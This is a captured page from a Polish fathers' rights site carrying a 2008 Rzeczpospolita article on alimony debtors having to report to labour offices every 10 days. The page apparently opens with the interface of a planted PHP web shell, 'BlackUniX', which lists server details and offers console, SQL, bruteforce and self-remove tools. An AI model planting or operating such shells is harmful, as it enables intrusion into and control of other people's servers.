W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-23 11:30:15
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.104.202
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Niesolidny rodzic co 10 dni w urzędzie pracy
15.09.2008.
Od października zacznie obowiązywać szczególna regulacja dotycząca niesolidnych rodziców: dla bezrobotnego będącego dłużnikiem alimentacyjnym wyznaczony termin nie może przekraczać 10 dni.

Kontrowersyjny obowiązek wynika z nowego brzmienia art. 33 ust. 3 ustawy o promocji zatrudnienia i instytucjach rynku pracy, które wprowadza ustawa przywracająca Fundusz Alimentacyjny.

Przedstawiciele służb zatrudnienia są zgodni: ten obowiązek nic nie da,jeśli ktoś nie ma zamiaru pracować, zwłaszcza że można go ominąć.

Chodzi raczej o nękanie niesolidnego rodzica. Zresztą w wielu urzędach niepłacący alimentów i tak pod względem aktywizacji są traktowani priorytetowo.

Żeby wyegzekwować ten obowiązek, urzędnicy najpierw muszą sprawdzić,czy w ich rejestrach są dłużnicy alimentacyjni – na podstawie informacji od wypłacających świadczenia z Funduszu Alimentacyjnego lub od komornika.Potem muszą wysłać do nich pierwsze wezwania.

– Samo doręczenie wezwania może trwać dłużej niż owe dziesięć dni– uważa Jerzy Bartnicki, dyrektor Powiatowego Urzędu Pracy w Kwidzynie.– Po pierwszej wizycie będzie już łatwiej – można w jej trakcie wyznaczyć termin następnego spotkania. Jeśli tylko do pierwszej wizyty w ogóle dojdzie.

– Ten obowiązek to sztuka dla sztuki. Jeśli wezwiemy taką osobę, a ona się nie pojawi, to wyrejestrujemy ją na trzy miesiące i jeśli nie chce,dalej nie będzie pracować – mówi Iwona Trzcińska, kierownik w Urzędzie Pracy m.st. Warszawy.

Po tych trzech miesiącach osoba może zarejestrować się ponownie (wtedy znów ryzykuje wezwanie). Dłużnik może też po prostu wyrejestrować się z urzędu. W większości wypadków jedyne, co traci, to ubezpieczenie zdrowotne.

Rząd proponuje zmianę krytykowanego przepisu. Zgodnie z przekazanym na Radę Ministrów projektem zmiany ustawy o promocji zatrudnienia i instytucjach rynku pracy bezrobotnego dłużnika alimentacyjnego urząd pracy będzie wzywał nie rzadziej niż co 90 dni. Tak jak każdy bezrobotny, będzie musiał zgłaszać się w celu przyjęcia propozycji odpowiedniej pracy albo innej formy pomocy proponowanej przez urząd lub w innym celu, w tym potwierdzenia gotowości do podjęcia pracy. Jak wynika z uzasadnienia, zmiana ta ma doprowadzać do zatrudnienia, zamiast zmuszania do obowiązkowego stawiennictwa co dziesięć dni w urzędzie.

Nim jednak nowelizacja wejdzie w życie (najwcześniej 1 stycznia 2009 r.),urzędy czeka kilka miesięcy wzmożonych działań wobec dłużników alimentacyjnych.

    Nowe zasady od października

    1 października wchodzi w życie ustawa z 7 września 2007 r. o pomocy osobom uprawnionym do alimentów (DzU nr 192, poz. 1378 ze zm.). Będą stosowane nie tylko nowe zasady wypłaty pomocy dla dzieci, które nie otrzymują zasądzonych alimentów, ale także zaostrzone reguły postępowania wobec dłużników alimentacyjnych. Więcej obowiązków wobec nich będą miały m.in. urzędy pracy.

Źródło: Magdalena Januszewska Rzeczypospolita

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:

Odwiedza nas 1 gość
23.07.2018.